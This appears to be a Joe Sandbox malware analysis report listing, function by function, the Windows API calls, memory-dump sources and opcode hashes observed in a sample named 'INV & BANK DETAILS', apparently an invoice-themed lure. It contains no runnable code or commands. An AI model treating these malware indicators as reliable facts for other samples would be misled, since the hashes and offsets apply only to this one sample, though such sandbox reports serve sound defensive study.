                                APIs
                                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: RegDeleteKeyExW$advapi32.dll
                                • API String ID: 2574300362-4033151799
                                • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 0047950F
                                • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                • VariantClear.OLEAUT32(?), ref: 00479650
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Variant$AllocClearCopyInitString
                                • String ID:
                                • API String ID: 2808897238-0
                                • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                APIs
                                • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                • __itow.LIBCMT ref: 004699CD
                                  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                • __itow.LIBCMT ref: 00469A97
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend$__itow
                                • String ID:
                                • API String ID: 3379773720-0
                                • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                APIs
                                • GetWindowRect.USER32(?,?), ref: 00449A4A
                                • ScreenToClient.USER32(?,?), ref: 00449A80
                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window$ClientMoveRectScreen
                                • String ID:
                                • API String ID: 3880355969-0
                                • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                APIs
                                • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                • GetWindowRect.USER32(?,?), ref: 00441722
                                • PtInRect.USER32(?,?,?), ref: 00441734
                                • MessageBeep.USER32(00000000), ref: 004417AD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Rect$BeepClientMessageScreenWindow
                                • String ID:
                                • API String ID: 1352109105-0
                                • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                APIs
                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: CreateHardLink$DeleteErrorFileLast
                                • String ID:
                                • API String ID: 3321077145-0
                                • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                APIs
                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                • __isleadbyte_l.LIBCMT ref: 004208A6
                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                • String ID:
                                • API String ID: 3058430110-0
                                • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                APIs
                                • GetParent.USER32(?), ref: 004503C8
                                • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Proc$Parent
                                • String ID:
                                • API String ID: 2351499541-0
                                • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                • TranslateMessage.USER32(?), ref: 00442B01
                                • DispatchMessageW.USER32(?), ref: 00442B0B
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Message$Peek$DispatchTranslate
                                • String ID:
                                • API String ID: 1795658109-0
                                • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                APIs
                                • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                • GetCaretPos.USER32(?), ref: 004743B2
                                • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                • GetForegroundWindow.USER32 ref: 004743EE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                • String ID:
                                • API String ID: 2759813231-0
                                • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                APIs
                                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                • _wcslen.LIBCMT ref: 00449519
                                • _wcslen.LIBCMT ref: 00449526
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend_wcslen$_wcspbrk
                                • String ID:
                                • API String ID: 2886238975-0
                                • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __setmode$DebugOutputString_fprintf
                                • String ID:
                                • API String ID: 1792727568-0
                                • Opcode ID: 82eaaed52695fbaf4d251d9c6fc514291b8525fa1fa6e6ee5924846bb5fa078f
                                • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                • Opcode Fuzzy Hash: 82eaaed52695fbaf4d251d9c6fc514291b8525fa1fa6e6ee5924846bb5fa078f
                                • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                APIs
                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window$Long$AttributesLayered
                                • String ID:
                                • API String ID: 2169480361-0
                                • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                APIs
                                  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                • lstrlenW.KERNEL32(?), ref: 00434CF6
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: lstrcmpilstrcpylstrlen$_malloc
                                • String ID: cdecl
                                • API String ID: 3850814276-3896280584
                                • Opcode ID: 3ef78af3aca15c91cacd853d03b8f67cf07cd8e3b86173aa1d6b869a3aeb5740
                                • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                • Opcode Fuzzy Hash: 3ef78af3aca15c91cacd853d03b8f67cf07cd8e3b86173aa1d6b869a3aeb5740
                                • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                APIs
                                  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                • _memmove.LIBCMT ref: 0046D475
                                • inet_ntoa.WSOCK32(?), ref: 0046D481
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                • String ID:
                                • API String ID: 2502553879-0
                                • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                APIs
                                • SendMessageW.USER32 ref: 00448C69
                                • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
